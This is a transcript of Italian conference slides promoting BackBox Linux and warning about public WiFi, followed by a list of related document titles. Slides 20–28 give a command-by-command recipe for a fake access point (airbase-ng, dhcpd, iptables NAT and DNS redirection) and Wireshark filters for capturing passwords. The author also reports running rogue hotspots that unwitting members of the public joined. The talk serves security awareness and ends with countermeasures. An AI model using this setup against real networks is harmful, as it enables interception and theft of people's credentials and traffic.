BackBox: WiFi Libero? Ti spio! Andrea Draghetti
|
|
- Susanna Barbato
- 2 anni fa
- Visualizzazioni
Transcript
1 BackBox: WiFi Libero? Ti spio! Andrea Draghetti
2 Agenda BackBox Linux Penetration Testing Distribution WiFi Libero? Ti spio! (Lo facciamo davvero...)
3 BackBox Linux BackBox è una distribuzione GNU/Linux derivata da Ubuntu nata nel 2010 per volontà di Raffaele Forte, progettata per eseguire Penetration Test e Security Assessment fornisce un insieme di strumenti che facilitano l'analisi di reti e sistemi informatici. Essa integra in un ambiente desktop gli strumenti necessari ad un ethical hacker per eseguire test di sicurezza. Recentemente offre supporto anche per l'informatica Forense e la Mobile Analysis! BackBox è Open Source e Free!
4 BackBox Screen
5 Top 100 Distro
6 BackBox Link Sito ufficiale: Wiki: wiki.backbox.org Forum: forum.backbox.org Facebook Group: Mirror Garr: Mirror OS: Repository: https://launchpad.net/~backbox
7 Un Caso Reale Sempre più connessi... Foto: Xcelus
8 Smartphone nel Mondo Fonte: Il Sole 24 Ore
9 Smartphone in Italia
10 WiFi finalmente libero Il 23 Luglio 2013 è stato definitivamente approvato l emendamento che liberalizza le reti WiFi in Italia.
11 Smartphone e WiFi Italiano Fonte: Cisco Febbraio '14
12 WiFi Libero e Utilizzo all'estero Ecco i principali risultati emersi dalla ricerca condotta negli UK: Il 31% del campione accede almeno una volta alla settimana a servizi Wi-Fi pubblici per consultare dati aziendali confidenziali, e in media, gli intervistati si collegano 15 volte a settimana a reti Wi-Fi aperte e poco sicure Il 52% dei pendolari teme che i propri dati possano essere intercettati durante il collegamento a una rete Wi-Fi pubblica ma, ciò nonostante, continua comunque ad utilizzarla La metà degli intervistati vive come una frustrazione l indisponibilità di reti Wi-Fi, a dimostrazione di come gli utenti ormai percepiscano questo servizio come indispensabile nella vita di tutti i giorni Il 20% dei dispositivi mobili non ha sistemi di sicurezza attivati, neppure una password o un codice PIN, e solo il 5% ha adottato policy di sicurezza corporate Fonte: GFI Software
13 WiFi Libero e Utilizzo Italiano Ho fatto una simulazione, con una Internet Key WiFi, alla Stazione Termini di Roma a Settembre 2013! SSID WiFi: Free WiFi Termini Utenti collegati contemporaneamente: 7 Utenti totali: ~16 Durata Test: ~1h
14 WiFi Libero e Utilizzo Italiano
15 Incauto Collegamento Risultato: 16 persone in circa un ora si sono collegate ad una rete WiFi sconosciuta, attratte dal plausibile nome di rete! 16utenti : 1h = Xutenti : 24h In una giornata il mio Access Point poteva raggiungere 384 utenti con un segnale che copre circa 7mt!
16 Eh ma nel 2014?! Il primo test l'ho contodotto un anno fa! Per essere sicuro l'ho ripetuto in un luogo pubblico lo scorso 20 Ottobre nell'orario di punta... Utenti collegati contemporaneamente: 5 Utenti totali: ~7 Durata Test: ~7minuti 7utenti : 7minuti = Xutenti : 60minuti 60utenti/h
17 Ero tra voi... Il test l'ho condotto all'istituto Tecnico Alberghetti alle 7:40 prima dell'ingresso nelle aule! SSID WiFi: Free WiFi Alberghetti
18 Ethical Hacking Se le mie intenzioni non fossero state pacifiche? Cosa potevo ottenere dagli utenti collegati al WiFi? Sfruttando un Access Point più potente/professionale?
19 Fake Access Point Creando un finto Access Point garantisco agli utenti di collegarsi ad internet e senza che loro si accorgano di nulla posso intercettare/sniffare tutto il traffico che generano. Otterrò: Cronologia di navigazione, , Ricerche, Password, ecc
20 Dimostrazione Non ci credete? Proviamo assieme! Occorrente: BackBox Linux Collegamento a Internet Adattatore WiFi USB Server DHCP Tanta volontà... :)
21 Installiamo il DHCP Server $ sudo -s $ apt-get update && apt-get install dhcp3-server $ gedit /etc/dhcpd.conf # Sample /etc/dhcpd.conf # FakeAP by Andrea Draghetti default-lease-time 600; max-lease-time 7200; option subnet-mask ; option broadcast-address ; option routers ; option domain-name-servers ; #OpenDNS subnet netmask { range ; }
22 Prepariamo l'interfaccia di Rete $ sudo -s $ airmon-ng check kill $ ifconfig eth0 down $ ifconfig eth broadcast $ route add default gateway $ ifconfig eth0 up eth0 è l'interfaccia di rete collegata ad internet.
23 Monitor Mode $ sudo -s $ airmon-ng start wlan0 wlan0 è l attuale interfaccia di rete wireless, se non conoscente la vostra interfaccia di rete wireless digitare il comando: iwconfig
24 Fake AP $ sudo -s $ airbase-ng --essid FakeAP -c 6 -v mon0 mon0 è interfaccia di rete creata nel passo precedente, ovvero con la funzione di Monitor Mode. Se non ricordate l interfaccia di rete creata digitare il comando: iwconfig
25 NetMask e Subnet (apriamo un nuovo terminale) $ sudo -s $ ifconfig at0 up $ ifconfig at netmask $ route add -net netmask gw at0 è interfaccia di rete creata nel passo precedente, ovvero con la funzione di Fake AP. Se non ricordate l interfaccia di rete creata digitare il comando: iwconfig
26 Start DHCP Server $ sudo -s $ touch /var/run/dhcpd.pid $ chmod 777 /var/run/dhcpd.pid $ dhcpd -d -f -cf /etc/dhcpd.conf at0 at0 è interfaccia di rete creata con la procedura di Fake AP. Se non ricordate l interfaccia di rete creata digitare il comando: iwconfig
27 IP Tables (apriamo un nuovo terminale) $ sudo -s $ iptables --flush $ iptables --table nat --flush $ iptables --delete-chain $ iptables --table nat --delete-chain $ echo 1 > /proc/sys/net/ipv4/ip_forward $ iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE $ iptables --append FORWARD --in-interface at0 -j ACCEPT $ iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to eth0 è l interfaccia di rete realmente collegata ad internet at0 è l interfaccia del Fake AP è il reale gateway, se non lo conoscete digitate il comando: route -n
28 WireShark $ sudo -s $ wireshark Visionare l'interfaccia at0 Filtri consigliati: tcp contains XXX Cerca la parola XXX in tutti i pacchetti TCP http.request Visualizza tutto il traffico GET e POST http Visualizza tutto il traffico HTTP ssl
29 Aneddoti Fonte: Paolo Attivissimo
30 The Fappening Un incredibile storia di accesso abusivo ai profili Cloud di centinaia di star di Hollywood, e conseguente pubblicazione online di Foto e Video intimi scattate con i loro smartphone! Selena Gomez Jennifer Lawrence Melanie Laurent Lizzy Caplan Rihanna (in foto) Emily Browning Jenny McCarthy Avril Lavigne Jessica Alba Kaley Cuoco Lady Gaga Hillary Duff...
31 Ipotesi: Fappening & Captive Portal Attraverso un Captive Portal, necessario per accedere ad una rete WiFi in uno o più eventi cinematografici, hanno indotto i VIP a registrarsi. L'errato utilizzo della medesima password per più servizi ha permesso agli attaccanti di accedere ai servizi Cloud delle vittime e di sottrare le Foto e Video intimi.
32 Contromisure La prima regola è DIFFIDATE, sfruttate la vostra offerta Internet! Ma a volte è indispensabile collegarsi ad un Access Point sconosciuto, possiamo proteggerci?
33 VPN Una Virtual Private Network permette di collegare in modo sicuro due estremi di una connessione tramite una rete non dedicata, tipicamente utilizzando internet. Si può vedere una VPN come l'estensione su scala geografica di una rete locale privata che collega tra loro terminali dislocati su tutto il territorio sfruttando una rete IP pubblica e realizzando una rete LAN, detta appunto virtuale e privata, logicamente del tutto equivalente ad una infrastruttura fisica di rete appositamente dedicata.
34 Server VPN? È possibile crearsi un proprio Server VPN: Sfruttando DD-WRT, firmware Open Source per il vostro Router, se è compatibile. Implementando pfsense, firewall/router software open source basato su FreeBSD, configurabile su un comune computer.
35 Contromisura Estrema Black Hole Data Bag isola il proprio dispositivo da qualsiasi segnale 2G, 3G o 4G oltre ai segnali WiFi, Bluetooth e NFC! La vostra privacy è assicurata! Fonte: D3Lab
36 Domande...?
TOR. The Onion Router project Marcello Viti marcello@linux.it
TOR The Onion Router project Marcello Viti marcello@linux.it LA PRIVACY E il diritto di una persona di esercitare le misure di controllo affinché le informazioni che la riguardano vengano trattate o guardate
Appunti configurazione firewall con distribuzione Zeroshell (lan + dmz + internet)
Appunti configurazione firewall con distribuzione Zeroshell (lan + dmz + internet) Il sistema operativo multifunzionale creato da Fulvio Ricciardi www.zeroshell.net lan + dmz + internet ( Autore: massimo.giaimo@sibtonline.net
Dipartimento di Scienze Applicate
DIPARTIMENTO DI SCIENZE APPLICATE Università degli Studi di Napoli Parthenope Centro Direzionale di Napoli Isola C4 80143 Napoli dsa@uniparthenope.it P. IVA 01877320638 Dipartimento di Scienze Applicate.
Firewall e NAT A.A. 2005/2006. Walter Cerroni. Protezione di host: personal firewall
Firewall e NAT A.A. 2005/2006 Walter Cerroni Protezione di host: personal firewall Un firewall è un filtro software che serve a proteggersi da accessi indesiderati provenienti dall esterno della rete Può
BackBox Linux e SET. Scopriamo il Phishing! Linux Day 24 Ottobre 2015 - Orvieto Lug
BackBox Linux e SET Scopriamo il Phishing! Agenda BackBox Linux - Penetration Testing Distribution Social Engineer Toolkit Phishing! BackBox Linux BackBox è una distribuzione Linux derivata da Ubuntu nata
Sicurezza nelle reti
Sicurezza nelle reti Manipolazione indirizzi IP 1 Concetti Reti Rete IP definita dalla maschera di rete Non necessariamente concetto geografico Non è detto che macchine della stessa rete siano vicine 2
Zeroshell per tutti! Pietro Palazzo,Nicola Contillo. 16 gennaio 2012
Zeroshell per tutti! Pietro Palazzo,Nicola Contillo 16 gennaio 2012 Indice 1 Congurazione sica 3 2 VirtualBox e primi passi 4 2.1 Installazione VirtualBox............................ 4 3 Congurazione Iniziale
Localizzare reti WiFi con Kismet e inssider www.html.it...
http://www.readability.com/articles/mjtgueg6 html.it Localizzare reti WiFi con Kismet e inssider by ANDREA DRAGHETTI Kismet e inssider sono due software in grado di rilevare reti wireless, di verificarne
Tre catene (chains) di base, si possono definire altre catene (convenzionalmente in minuscolo)
iptables passo-passo Prima del kernel 2.0 ipfwadm, dal kernel 2.2 ipchains, dopo il kernel 2.4 iptables Firewall (packet filtering, Nat (Network Address Translation)) NetFilter (layer del kernel per il
CREA IL TUO SERVER CASALINGO
LINUX DAY 2008 PESCARALUG CREA IL TUO SERVER CASALINGO sottotitolo: FAI RIVIVERE IL TUO BANDONE GRAZIE A LINUX DUE DESTINI POSSIBILI: 1) Se avete hardware vecchio e/o rotto e volete liberarvene, telefonate
Firewall e Abilitazioni porte (Port Forwarding)
Firewall e Abilitazioni porte (Port Forwarding) 1 Introduzione In questa mini-guida mostreremo come creare le regole sul Firewall integrato del FRITZ!Box per consentire l accesso da Internet a dispositivi
Airsnarf è stato sviluppato e rilasciato per dimostrare la vulnerabilità intrinseca degli hot-spot.
In questo tutorial verrà spiegato come configurare al 100 % Airsnarf. Mah...Cos è Airsnarf??? Airsnarf è stato sviluppato e rilasciato per dimostrare la vulnerabilità intrinseca degli hot-spot. Airsnarf
DEPLOY DI ZEROSHELL IN AMBIENTE VIRTUALE. Lorenzo Comi
DEPLOY DI ZEROSHELL IN AMBIENTE VIRTUALE Lorenzo Comi Introduzione: software ed hardware 2 Software per la virtualizzazione: VMware Fusion. 3 macchine virtuali Zeroshell 3.0.0 con profilo attivo. Macchina
Scritto da Administrator Lunedì 01 Settembre 2008 06:29 - Ultimo aggiornamento Sabato 19 Giugno 2010 07:28
Viene proposto uno script, personalizzabile, utilizzabile in un firewall Linux con 3 interfacce: esterna, DMZ e interna. Contiene degli esempi per gestire VPN IpSec e PPTP sia fra il server stesso su gira
Configurazione server e client DHCP in Linux
Configurazione server e client DHCP in Linux Laboratorio di Reti Ing. Telematica - Università Kore Enna A.A. 2008/2009 Ing. A. Leonardi DHCP DHCP sta per Dynamic Host Configuration Protocol e identifica
Esercitazione 7 Sommario Firewall introduzione e classificazione Firewall a filtraggio di pacchetti Regole Ordine delle regole iptables 2 Introduzione ai firewall Problema: sicurezza di una rete Necessità
FIREWALL: LA PROTEZIONE PER GLI ACCESSI ESTERNI
FIREWALL VPN RETI PRIVATE VIRTUALI: ACCESSO REMOTO Fondazione dell'ordine degli Ingegneri della Provincia di Milano Commissione per l'ingegneria dell'informazione ing. Gianluca Sironi FIREWALL: LA PROTEZIONE
Craccare una rete WPA2 tramite pin WPS
Craccare una rete WPA2 tramite pin WPS Il sistema WPS è nato per facilitare l'uso delle reti Wi-Fi soprattutto da parte dei meno esperti, e serve ad attivare il collegamento tra host e client tramite un
La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I
La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni
La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I
La VPN con il FRITZ!Box Parte I 1 Descrizione Ogni utente di Internet può scambiare dati ed informazioni con qualunque altro utente della rete. I dati scambiati viaggiano nella nuvola attraverso una serie
Transparent Firewall
Transparent Firewall Dallavalle A. Dallavalle F. Sozzi 18 Febbraio 2006 In un sistema operativo Linux con un kernel aggiornato alla versione 2.6.x è possibile realizzare un transparent firewall utilizzando
La sicurezza nelle reti wireless (Wi Fi) Dott. Ing. Antonio Tringali per ArsLogica Sistemi Srl
La sicurezza nelle reti wireless (Wi Fi) Dott. Ing. Antonio Tringali per ArsLogica Sistemi Srl 30/10/2008 Indice degli argomenti Le reti wireless di tipo Wi-Fi Tipi di rischio: Monitoraggio del traffico
Raspberry Pi - Labolatorio Informatica
Raspberry Pi - Labolatorio Informatica Indice 1 Prerequisiti 2 2 Installazione di Raspbian su scheda SD 2 2.1 Installazione con Linux...................................... 2 2.2 Installazione con Windows....................................
Filtraggio del traffico IP in linux
Filtraggio del traffico IP in linux Laboratorio di Amministrazione di Sistemi L-A Dagli appunti originali di Fabio Bucciarelli - DEIS Cos è un firewall? E un dispositivo hardware o software, che permette
Iptables. Mauro Piccolo piccolo@di.unito.it
Iptables Mauro Piccolo piccolo@di.unito.it Iptables Iptables e' utilizzato per compilare, mantenere ed ispezionare le tabelle di instradamento nel kernel di Linux La configurazione di iptables e' molto
Corso avanzato di Reti e sicurezza informatica
Corso avanzato di Reti e sicurezza informatica http://www.glugto.org/ GNU/Linux User Group Torino Rilasciato sotto licenza CC-by-nc-sa. 1 DISCLAIMER L'insegnante e l'intera associazione GlugTo non si assumono
Guida pratica all utilizzo di Zeroshell
Guida pratica all utilizzo di Zeroshell Il sistema operativo multifunzionale creato da Fulvio.Ricciardi@zeroshell.net www.zeroshell.net Proteggere una piccola rete con stile ( Autore: cristiancolombini@libero.it
Corsi di Formazione Open Source & Scuola Provincia di Pescara gennaio 2005 aprile 2005. http://happytux.altervista.org ~ anna.1704@email.
Corsi di Formazione Open Source & Scuola Provincia di Pescara gennaio 2005 aprile 2005 LINUX LINUX CON RETI E TCP/IP http://happytux.altervista.org ~ anna.1704@email.it 1 LAN con router adsl http://happytux.altervista.org
Manuale di configurazione CONNECT GW
Modulo gateway FA00386-IT B A 2 10 Manuale di configurazione CONNECT GW INFORMAZIONI GENERALI Per connettere una o più automazioni al portale CAME Cloud o ad una rete locale dedicata e rendere possibile
Implementazione di VLAN multiple per l utilizzo della rete wireless
Servizio Calcolo e Reti Pavia, 15 Agosto 2006 Implementazione di VLAN multiple per l utilizzo della rete wireless Andrea Rappoldi 1 Introduzione 2 Configurazione degli switch Catalyst Occorre definire
Crittografia e sicurezza delle reti. Firewall
Crittografia e sicurezza delle reti Firewall Cosa è un Firewall Un punto di controllo e monitoraggio Collega reti con diversi criteri di affidabilità e delimita la rete da difendere Impone limitazioni
Guida d installazione rapida
V38.01 IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) FI8909/FI8909W ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione rapida Lista d imballaggio 1) IP CAMERA
Packet Filter in LINUX (iptables)
Packet Filter in LINUX (iptables) Laboratorio di Reti Ing. Telematica - Università Kore Enna A.A. 2008/2009 Ing. A. Leonardi Firewall Può essere un software che protegge il pc da attacchi esterni Host
VLAN+LDAP+...+XEN = Rete Dipartimentale
VLAN+LDAP+...+XEN = Rete Dipartimentale Uniamo varie tecnologie per creare una infrastruttura di rete,, facilmente controllabile ed estendibile. Useremo VLAN ( 802.1q), LDAP, XEN, Certificati digitali
Setup dell ambiente virtuale
Setup dell ambiente virtuale 1.1 L immagine per le macchine virtuali Il file mininet-vm-x86 64.qcow è l immagine di una memoria di massa su cui è installato un sistema Linux 3.13 Ubuntu 14.04.1 LTS SMP
INTRODUZIONE ALLE RETI: UN APPROCCIO PRATICO
INTRODUZIONE ALLE RETI: UN APPROCCIO PRATICO okfabian@yahoo.com Fabian Chatwin Cedrati Ogni scheda di rete ha un indirizzo MAC univoco L'indirizzo IP invece viene impostato dal Sistema Operativo HUB 00:50:DA:7D:5E:32
esercizi su sicurezza delle reti 2006-2008 maurizio pizzonia sicurezza dei sistemi informatici e delle reti
esercizi su sicurezza delle reti 20062008 maurizio pizzonia sicurezza dei sistemi informatici e delle reti 1 supponi i fw siano linux con iptables dai una matrice di accesso che esprima la policy qui descritta
Guida rapida all utilizzo di Sevio Step 7. Document ID: svb01_step_7_v3
Guida rapida all utilizzo di Sevio Step 7 Document ID: svb01_step_7_v3 2014 Sevio. Tutti i diritti riservati. Marchi commerciali Sevio è un marchio commerciale di Eurobica Corporate. Siemens, Step 7, sono
1... reti di calcolatori...15 Introduzione... 15 Parametri di rete... 21
Sommario Introduzione...11 1... reti di calcolatori...15 Introduzione... 15 Parametri di rete... 21 L indirizzo IP... 22 La maschera di sottorete... 25 Protocollo IPv4 e IPv6... 28 Supporto IPv6 in Windows
INFOSECURITY 2006 9 febbraio 2006 La difficile arte del compromesso fra semplicità e sicurezza in architetture complesse
INFOSECURITY 2006 9 febbraio 2006 La difficile arte del compromesso fra semplicità e security @ gelpi.it www.gelpi.it I computer sono al servizio dell'uomo e non l'uomo al servizio dei computer. Negli
Item Stato Nota a margine. Item Stato Nota a margine. Item Stato WLAN Nota a margine. Modo Wireless Abilita (B/G/N Mixed)
sistema [ AIUTO ] Nota a margine Indirizzo IP 2.192.140.182 Subnet Mask 255.255.255.255 Gateway 10.64.64.64 Domain Name Server 10.204.57.104, 10.205.41.16 Tempo connessione 02:20:28 Informazioni Modem
Una minaccia dovuta all uso dell SNMP su WLAN
Una minaccia dovuta all uso dell SNMP su WLAN Gianluigi Me, gianluigi@wi-fiforum.com Traduzione a cura di Paolo Spagnoletti Introduzione Gli attacchi al protocollo WEP compromettono la confidenzialità
Università di Roma La Sapienza Facoltà di Ingegneria. Lezione 5. Passi base per le esperienze ed esercizi contenuti in questa lezione
UniversitàdiRomaLaSapienza FacoltàdiIngegneria Corso di ProgettazionediRetieSistemiInformatici,a.a.2010/2011 Dott.EmilianoCasalicchio Lezione5 5Maggio2011 *** Passibaseperleesperienzeedesercizicontenutiinquestalezione
pod Guida all installazione di rete del Solstice Pod Introduzione Solstice Pod Collaborazione Visuale Wireless Solstice sulla vostra rete
Introduzione Solstice Pod Collaborazione Visuale Wireless Una volta installato, il Solstice Pod permette a più utenti di condividere simultaneamente il proprio schermo su un display tramite la rete Wi-Fi
Caratteristiche HW. Clock Speed 16 MHz
ARDUINO YÚN Caratteristiche HW AVR Arduino Microcontroller ATmega32u4 Operating Voltage 5V Input Voltage 5V Digital I/O Pins 20 PWM Channels 7 Analog Input Channels 12 DC Current per I/O Pin 40 ma DC Current
Contenuto del pacchetto
Contenuto del pacchetto DWL-900AP Trasformatore AC Cavo USB CD d installazione Manuale utente Manuale rapido d installazione Se uno o più componenti dovessero risultare mancanti o danneggiati, contattare
Simulazione seconda prova Sistemi e reti Marzo 2016
Ipotesi progettuali Studio medico situato in un appartamento senza reti pre-esistenti con possibilità di cablaggio a muro in canalina. Le dimensioni in gioco possono far prevedere cavi non troppo lunghi
IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd
IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) Modello: FI8910W Colore: Nera Modello: FI8910W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione
Quando il nuovo rende insicure le VPN
Quando il nuovo rende insicure le VPN Sfruttando il poco conosciuto IPv6 si può creare una condizione di rete per la quale, in determinate circostanze, il traffco web normalmente diretto su una vpn sicura
Introduzione a Windows XP Professional Installazione di Windows XP Professional Configurazione e gestione di account utente
Programma Introduzione a Windows XP Professional Esplorazione delle nuove funzionalità e dei miglioramenti Risoluzione dei problemi mediante Guida in linea e supporto tecnico Gruppi di lavoro e domini
Modem Fibra (ONT) ALU I-240W-Q. Manuale Utente
Modem Fibra (ONT) ALU I-240W-Q Manuale Utente I Sommario 1 Accesso all interfaccia web di gestione... 1 2 Configurazioni... 1 2.1 LAN... 1 2.2 Rete Wireless (WLAN)... 2 2.3 Sicurezza... 4 2.3.1 Filtro
IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd
IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) Modello: FI8910W Colore: Nera Modello: FI8910W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione
Sicurezza delle reti. Monga. Tunnel. Sicurezza delle reti. Monga
Sicurezza dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it Lezione XIX: Virtual Private Network a.a. 2015/16 1 cba 2011 15 M.. Creative Commons
Guida al cracking di chiavi wep
Guida al cracking di chiavi wep Ciao sono h4ck3r0n3 con questa guida intendo spiegare nel lato pratico come è possibile crackare una chiave wep per mezzo di BackTrack 3 e di un asus Eeepc. In breve vi
Man In The Middle & SSL Attack
Man In The Middle & SSL Attack Autore: Duffabio Provenienza: http://duffabio.altervista.org/ Ringrazio BlackLight perchè per la teoria mi sono basato sulle sue guide visto che è da li che ho studiato la
Tecnico Hardware & Sistemistica
Tecnico Hardware & Sistemistica Modulo 1 - Hardware (6 ore) Modulo 2 - Software (8 ore) Modulo 3 - Reti LAN e WLAN (12 ore) Modulo 4 - Backup (4 ore) Modulo 5 - Cloud Computing (4 ore) Modulo 6 - Server
Conserva in tutta sicurezza documenti, file musicali e video in rete. Condividili e scarica con BitTorrent anche a PC spento
Conserva in tutta sicurezza documenti, file musicali e video in rete. Condividili e scarica con BitTorrent anche a PC spento Tra download da Internet, documenti, copie di backup di CD e DVD e altri file,
Servizio notturno e Accesso ospite
Servizio notturno e Accesso ospite 1 Introduzione In questa mini-guida mostreremo come configurare ed utilizzare alcune tra le più innovative soluzioni disponibili per la rete wireless di FRITZ!Box, come
Internet. Presentato da N. Her(d)man & Picci. Fabrizia Scorzoni. Illustrazioni di Valentina Bandera
Internet Presentato da N. Her(d)man & Picci Fabrizia Scorzoni Illustrazioni di Valentina Bandera Titolo: Internet Autore: Fabrizia Scorzoni Illustrazioni: Valentina Bandera Self-publishing Prima edizione
Sommario. Oggetto: Istruzioni configurazione client VPN per piattaforma Mac OSX Data: 25/01/2016 Versione: 1.0
Oggetto: Istruzioni configurazione client VPN per piattaforma Mac OSX Data: 25/01/2016 Versione: 1.0 Sommario 1. PREMESSA... 2 2. INSTALLAZIONE SOFTWARE VPN CLIENT... 2 3. PRIMO AVVIO E CONFIGURAZIONE
www.lug-govonis.net LINUX e le reti
LINUX e le reti Ci troviamo di fronte ad una rete quando 2 o più computer sono in grado di comunicare tra di loro; esistono molti tipi di connessioni di rete divisi per protocollo di trasporto e per tipo
Esercitazione 5 Firewall
Sommario Esercitazione 5 Firewall Laboratorio di Sicurezza 2015/2016 Andrea Nuzzolese Packet Filtering ICMP Descrizione esercitazione Applicazioni da usare: Firewall: netfilter Packet sniffer: wireshark
Sommario. Oggetto: Istruzioni configurazione client VPN SSL per piattaforma Windows Data: 25/01/2016 Versione: 1.0
Oggetto: Istruzioni configurazione client VPN SSL per piattaforma Windows Data: 25/01/2016 Versione: 1.0 Sommario 1. PREMESSA... 2 2. INSTALLAZIONE SOFTWARE VPN CLIENT... 2 3. PRIMO AVVIO E CONFIGURAZIONE
ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme.
Visio Wifi Setup - Windows Rev. 1.0.0 Prerequisiti: Prima di procedere con l installazione assicurarsi di avere pieno accesso alla configurazione del router Wifi. Attenzione: non tutti i router risultano
Il FIREWALL LINUX Basare la sicurezza della rete su un sistema operativo gratuito
Il FIREWALL LINUX Basare la sicurezza della rete su un sistema operativo gratuito Cosa si intende per sicurezza di rete Accesso a sistemi, servizi e risorse solo da e a persone autorizzate Evitare di essere
Corso di Laurea in Ingegneria Informatica. Corso di Reti di Calcolatori a.a. 2009/10
Corso di Laurea in Ingegneria Informatica Corso di Reti di Calcolatori a.a. 2009/10 Roberto Canonico (roberto.canonico@unina.it) Antonio Pescapè (pescape@unina.it) ICMP ARP RARP DHCP - NAT ICMP (Internet
1. BENVENUTI CARATTERISTICHE
1. BENVENUTI NB CARATTERISTICHE FUNZIONI AVANZATE 1.2 CONTENUTO CONFEZIONE 1.3 VISTE PRODOTTO VISTA FRONTALE PANNELLO POSTERIORE (vedi 2.5.5) PULSANTE RESET: 1.4 REQUISITI DI SISTEMA PC NB 1.5 ISTRUZIONI
Wireless LAN Mobility
Wireless LAN Mobility in Regione Piemonte Mario ANCILLI SETTORE SISTEMI INFORMATIVI ED INFORMATICA DIREZIONE ORGANIZZAZIONE; PIANIFICAZIONE, SVILUPPO E GESTIONE DELLE RISORSE UMANE Torino, 3 maggio 2004
Istruzioni di configurazione Wi-Fi per inverter Solar River TL-D
Istruzioni di configurazione Wi-Fi per inverter Solar River TL-D Per consentire la connessione dell inverter è necessario possedere un router WiFi. Non ci sono particolari requisiti sulla tipologia di
Dati a rischio per i pendolari: il 100% utilizza connessioni Wi-Fi aperte e sconosciute mettendo a rischio informazioni personali e aziendali
Dati a rischio per i pendolari: il 100% utilizza connessioni Wi-Fi aperte e sconosciute mettendo a rischio informazioni personali e aziendali Ogni giorno, chi utilizza connessioni Wi-Fi nel tragitto casa-lavoro,
Modelli architetturali di infrastruttura. Diego Feruglio Direzione Progettazione Infrastrutture CSI-Piemonte
Modelli architetturali di infrastruttura Direzione Progettazione Infrastrutture CSI-Piemonte 0 Infrastruttura Definizione di Infrastruttura Nell ICT per infrastruttura si intende l insieme di componenti
Sicurezza Reti. netrd. Versione: 2.1.1
Sicurezza Reti netrd Versione: 2.1.1 netrd è commercializzato da etstart srl via Austria, 23/D - 35127 Padova (PD), Italy - info@etstart.itt.it - www.etstart.it INDICE 1 Finalità documento 1.1 Destinatari
Realizzazione di un Firewall con IPCop
Realizzazione di un Firewall con IPCop Con questo articolo vedremo come installare IpCop, una distribuzione GNU/Linux per firewall facile da installare e da gestire (grazie alla sua interfaccia di amministrazione
Realizzazione di un HotSpot su rete Fastweb con ZeroShell su VMWare
Realizzazione di un HotSpot su rete Fastweb con ZeroShell su VMWare Il sistema operativo multifunzionale creato da Fulvio Riccardi www.zeroshell.net Autore: Antonio C. Hardware e software utilizzato: Pentium
Configurare Windows 2003 Server per routing e accesso remoto
fonte: http://www.sysadmin.it Configurare Windows 2003 Server per routing e accesso remoto Articolo recensito da Paolo Latella In questa guida spiegheremo come configurare il nostro windows 2003 Server
FRITZ!WLAN Repeater 300E. Come estendere la copertura della rete Wi-Fi
Come estendere la copertura della rete Wi-Fi 1 Introduzione La crescente diffusione di dispositivi portatili per il collegamento ad Internet ha reso la connettività senza fili una caratteristica imprescindibile
Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Studenti LUSPIO
Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Studenti LUSPIO Requisiti Hardware Disporre di un terminale con scheda wireless compatibile con gli
Dispense corso Laboratorio di Internet
Universitá di Roma Sapienza Dipartimento di Ingegneria Elettronica e delle Telecomunicazioni Dispense corso Laboratorio di Internet Luca Chiaraviglio E-mail: {luca.chiaraviglio}@diet.uniroma1.it 3 marzo
FIREWALL iptables V1.1 del 18/03/2013
FIREWALL iptables V1.1 del 18/03/2013 1/18 Copyright 2013 Dott.Ing. Ivan Ferrazzi Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License,
Sviluppo siti e servizi web Programmi gestionali Formazione e Consulenza Sicurezza informatica Progettazione e realizzazione di reti aziendali
1 Caratteristiche generali Nati dall esperienza maturata nell ambito della sicurezza informatica, gli ECWALL di e-creation rispondono in modo brillante alle principali esigenze di connettività delle aziende:
Cosa è Tower. Sistema di autenticazione per il controllo degli accessi a reti wireless. struttura scalabile. permette la nomadicità degli utenti
Cosa è Tower Sistema di autenticazione per il controllo degli accessi a reti wireless struttura scalabile consente la federazione tra reti di enti/operatori t i differenti permette la nomadicità degli
Innanzitutto, esistono diversi modi per realizzare una rete o più reti messe insieme; vi illustro la mia soluzione :
SALVE, Scrivo questo breve testo di delucidazioni a seguito di alcune richieste.. e per permettere a tutti di usare al meglio zeroshell per quanto riguarda i sistemi di video sorveglianza; é mia intenzione
IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd
IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) Modello: FI8916W Colore: Nera Modello: FI8916W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione
ftp://188.11.12.52 www.ezviz7.com
MOVITECH S.r.l. Via Vittorio Veneto n 63-22060 CARUGO (CO) Tel. 031 764275/6 - Fax 031 7600604 www.movitech.it - info@movitech.it COME UTILIZZARE IL CLOUD HIKVISION Hikvision, numero 1 al mondo nella produzione
CLOUD AWS. #cloudaws. Community - Cloud AWS su Google+ Amazon Web Services. Amazon VPC (Virtual Private Cloud)
Community - Cloud AWS su Google+ Web Services VPC (Virtual Private Cloud) Oggi vediamo le caratteristiche generali del servizio di VPC per creare una rete virtuale nel cloud. Hangout 29 del 27.10.2014
Via Maria 122, 03100 FROSINONE www.hellotel.it info@hellotel.it. MANUALE di INSTALLAZIONE e CONFIGURAZIONE INTERNET ADSL Wi-Fi
